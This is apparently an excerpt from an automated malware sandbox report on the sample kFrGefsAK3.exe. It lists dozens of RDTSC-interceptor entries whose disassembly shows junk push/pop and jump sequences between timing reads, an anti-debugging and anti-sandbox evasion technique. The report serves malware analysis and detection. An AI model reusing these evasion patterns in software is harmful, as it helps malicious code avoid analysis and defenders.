Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E127D second address: 13E1281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E1281 second address: 13E1294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0151 second address: 13E0171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FA278C27B76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA278C27B84h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0171 second address: 13E0185 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007FA278C0D016h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0185 second address: 13E0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0189 second address: 13E018F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E018F second address: 13E0195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0195 second address: 13E0199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E0199 second address: 13E019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7111 second address: 13E7122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C0D01Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7122 second address: 13E7126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7126 second address: 13E7131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B2861 second address: 13B2865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B2A16 second address: 13B2A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FA278C0D016h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B2AD2 second address: 13B2ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FA278C27B76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B2ADC second address: 13B2AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B2D34 second address: 13B2D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jng 00007FA278C27B76h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B30E2 second address: 13B310D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, dword ptr [ebp+122D1DC2h] 0x00000010 push 0000001Eh 0x00000012 mov cl, 9Bh 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA278C0D024h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B310D second address: 13B3132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jbe 00007FA278C27B76h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B3132 second address: 13B313D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FA278C0D016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B321B second address: 13B3221 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7573 second address: 13E75B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA278C0D018h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FA278C0D01Ah 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007FA278C0D01Ch 0x00000020 pop eax 0x00000021 jmp 00007FA278C0D01Fh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop eax 0x0000002a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7B11 second address: 13E7B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7B17 second address: 13E7B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7B1B second address: 13E7B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7B1F second address: 13E7B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7C79 second address: 13E7C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA278C27B76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13E7C84 second address: 13E7C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C0D01Ch 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13EE5CD second address: 13EE5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13EE5D1 second address: 13EE5D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13EE5D5 second address: 13EE60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FA278C27B8Eh 0x00000013 jno 00007FA278C27B7Ch 0x00000019 jp 00007FA278C27B76h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 136BDFB second address: 136BE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA278C0D016h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FA278C0D016h 0x00000013 ja 00007FA278C0D016h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 136BE14 second address: 136BE28 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA278C27B76h 0x00000008 je 00007FA278C27B76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 136BE28 second address: 136BE2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F2CC5 second address: 13F2CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F2CCB second address: 13F2CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F2CCF second address: 13F2CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F322C second address: 13F323D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FA278C0D016h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F33A5 second address: 13F33AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA278C27B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F33AF second address: 13F33CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C0D027h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F382C second address: 13F3830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F3830 second address: 13F3848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F3848 second address: 13F384E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F39F5 second address: 13F39FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F39FB second address: 13F3A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F3CC1 second address: 13F3CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F3CC7 second address: 13F3CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F3CE6 second address: 13F3CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F3CEA second address: 13F3CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F3CF0 second address: 13F3D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA278C0D01Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F3D01 second address: 13F3D18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B82h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F6048 second address: 13F604E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F604E second address: 13F6052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F6052 second address: 13F605B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F605B second address: 13F6062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8E09 second address: 13F8E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8E0F second address: 13F8E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8E13 second address: 13F8E30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8E30 second address: 13F8E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8E36 second address: 13F8E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8E3E second address: 13F8E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8F99 second address: 13F8F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8F9F second address: 13F8FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FA278C27B84h 0x0000000b jmp 00007FA278C27B7Ch 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 ja 00007FA278C27B76h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8FC3 second address: 13F8FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13F8FCE second address: 13F8FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13FD42E second address: 13FD44A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FA278C0D01Bh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FA278C0D016h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13FD44A second address: 13FD44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13FCC06 second address: 13FCC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140413E second address: 1404152 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA278C27B7Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jne 00007FA278C27B76h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1404152 second address: 140415C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA278C0D016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140415C second address: 1404171 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA278C27B76h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1404171 second address: 1404181 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1404181 second address: 14041AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B83h 0x00000007 jmp 00007FA278C27B82h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1402AC2 second address: 1402AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1402D28 second address: 1402D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C27B86h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1402D45 second address: 1402D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007FA278C0D016h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1402E97 second address: 1402E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1402E9B second address: 1402EA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1402EA8 second address: 1402EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1402EAD second address: 1402EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FA278C0D016h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B2F05 second address: 13B2F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA278C27B84h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B2F1F second address: 13B2FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+1247FF6Bh] 0x00000010 mov edi, dword ptr [ebp+122D35A5h] 0x00000016 mov dword ptr [ebp+122D1D38h], esi 0x0000001c add eax, ebx 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FA278C0D018h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 nop 0x00000039 push edi 0x0000003a jmp 00007FA278C0D027h 0x0000003f pop edi 0x00000040 push eax 0x00000041 jmp 00007FA278C0D01Dh 0x00000046 nop 0x00000047 mov dword ptr [ebp+122D266Ah], ebx 0x0000004d push 00000004h 0x0000004f mov dword ptr [ebp+122D30F5h], ebx 0x00000055 nop 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FA278C0D020h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14032B3 second address: 14032B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14032B7 second address: 14032BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403428 second address: 140342E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140342E second address: 1403432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403432 second address: 1403441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA278C27B76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403E56 second address: 1403E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C0D025h 0x00000009 popad 0x0000000a jbe 00007FA278C0D018h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403E7B second address: 1403E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403E81 second address: 1403E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403E87 second address: 1403E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA278C27B76h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140830D second address: 1408316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14076F5 second address: 14076FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14076FA second address: 1407700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407700 second address: 140770C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA278C27B76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
